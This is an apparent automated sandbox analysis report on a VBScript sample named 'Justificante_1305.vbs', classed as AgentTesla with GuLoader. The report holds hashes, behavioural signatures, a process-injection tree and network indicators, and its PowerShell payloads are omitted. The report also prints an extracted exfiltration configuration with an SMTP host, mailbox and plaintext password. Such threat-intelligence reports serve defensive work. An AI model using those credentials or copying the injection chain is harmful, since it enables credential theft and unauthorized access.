Analysis
max time kernel: 142s
max time network: 122s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 23-09-2024 14:08

Static task: static1
Behavioral task: behavioral1
  Sample: Justificante_1305.vbs
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: Justificante_1305.vbs
  Resource: win10v2004-20240802-en
General
Target: Justificante_1305.vbs
Size: 19KB
MD5: 9b1f7ea12daa77c87447f05ff1ac6f5e
SHA1: 58d9c2cb1c146a81412a308d1c6b6b8b6e31f1a4
SHA256: 2e98277dc23d49726e32785822944fd82ad43068321e1b5ee7e5d1d8a8bc1bbc
SHA512: 035a86675229744b63b5f0974164e12e6934a35074f59986b232bf4c6acda245bca34982b8c649ac934659e6af0e8e33ed7b049c58bda787ba9277956c06114b
SSDEEP: 384:pQ3GOmBsxCnn+8jZHMfOOoq76ITBJQcO5I4xDIeiAD2F7sGk:639cs8n+0ej2OBJQczIT1
Malware Config
Extracted: agenttesla
Protocol: smtp
Host: smtp.yandex.com
Port: 587
Username: [email protected]
Password: marcellinus360
Email To: [email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in Visual Basic.
-
Guloader,Cloudeye
A shellcode-based downloader first seen in 2020.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious access to, or copying of, the web browser credential store.
-
Blocklisted process makes network request 3 IoCs
flow  pid   Process
3     2236  WScript.exe
7     3024  powershell.exe
9     3024  powershell.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow  ioc
11    drive.google.com
6     drive.google.com
7     drive.google.com
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow  ioc
19    api.ipify.org
20    api.ipify.org
-
pid   Process
3024  powershell.exe
2212  cmd.exe
2300  powershell.exe
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid   Process
2940  wabmig.exe
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid   Process
2300  powershell.exe
2940  wabmig.exe
-
Suspicious use of SetThreadContext 1 IoCs
description                          pid   Process         procid_target
PID 2300 set thread context of 2940  2300  powershell.exe  37
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description  ioc                                                         Process
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  wabmig.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid   Process
2300  powershell.exe
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid   Process
3024  powershell.exe
2300  powershell.exe
2300  powershell.exe
2940  wabmig.exe
2940  wabmig.exe
-
Suspicious behavior: MapViewOfSection 1 IoCs
pid   Process
2300  powershell.exe
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
description              pid   Process
Token: SeDebugPrivilege  3024  powershell.exe
Token: SeDebugPrivilege  2300  powershell.exe
Token: SeDebugPrivilege  2940  wabmig.exe
-
Suspicious use of SetWindowsHookEx 1 IoCs
pid   Process
2940  wabmig.exe
-
Suspicious use of WriteProcessMemory 23 IoCs
description                       pid   Process         procid_target
PID 2236 wrote to memory of 3024  2236  WScript.exe     30
PID 2236 wrote to memory of 3024  2236  WScript.exe     30
PID 2236 wrote to memory of 3024  2236  WScript.exe     30
PID 3024 wrote to memory of 2852  3024  powershell.exe  32
PID 3024 wrote to memory of 2852  3024  powershell.exe  32
PID 3024 wrote to memory of 2852  3024  powershell.exe  32
PID 3024 wrote to memory of 2212  3024  powershell.exe  34
PID 3024 wrote to memory of 2212  3024  powershell.exe  34
PID 3024 wrote to memory of 2212  3024  powershell.exe  34
PID 2212 wrote to memory of 2300  2212  cmd.exe         35
PID 2212 wrote to memory of 2300  2212  cmd.exe         35
PID 2212 wrote to memory of 2300  2212  cmd.exe         35
PID 2212 wrote to memory of 2300  2212  cmd.exe         35
PID 2300 wrote to memory of 1264  2300  powershell.exe  36
PID 2300 wrote to memory of 1264  2300  powershell.exe  36
PID 2300 wrote to memory of 1264  2300  powershell.exe  36
PID 2300 wrote to memory of 1264  2300  powershell.exe  36
PID 2300 wrote to memory of 2940  2300  powershell.exe  37
PID 2300 wrote to memory of 2940  2300  powershell.exe  37
PID 2300 wrote to memory of 2940  2300  powershell.exe  37
PID 2300 wrote to memory of 2940  2300  powershell.exe  37
PID 2300 wrote to memory of 2940  2300  powershell.exe  37
PID 2300 wrote to memory of 2940  2300  powershell.exe  37
Processes
C:\Windows\System32\WScript.exe (depth 1)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Justificante_1305.vbs"
  - Blocklisted process makes network request
  - Suspicious use of WriteProcessMemory
  PID: 2236
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[obfuscated PowerShell script omitted]"
    - Blocklisted process makes network request
    - Network Service Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 3024
    C:\Windows\system32\cmd.exe (depth 3)
      Command line: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Potboiled.Asy && echo t"
      PID: 2852
    C:\Windows\system32\cmd.exe (depth 3)
      Command line: "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "[obfuscated PowerShell script omitted]"
      - Network Service Discovery
      - Suspicious use of WriteProcessMemory
      PID: 2212
      C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe (depth 4)
        Command line: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "[obfuscated PowerShell script omitted]"
        - Network Service Discovery
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious use of SetThreadContext
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: CmdExeWriteProcessMemorySpam
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: MapViewOfSection
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        PID: 2300
        C:\Windows\SysWOW64\cmd.exe (depth 5)
          Command line: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Potboiled.Asy && echo t"
          - System Location Discovery: System Language Discovery
          PID: 1264
        C:\Program Files (x86)\windows mail\wabmig.exe (depth 5)
          Command line: "C:\Program Files (x86)\windows mail\wabmig.exe"
          - Suspicious use of NtCreateThreadExHideFromDebugger
          - Suspicious use of NtSetInformationThreadHideFromDebugger
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of SetWindowsHookEx
          PID: 2940
MITRE ATT&CK Enterprise v15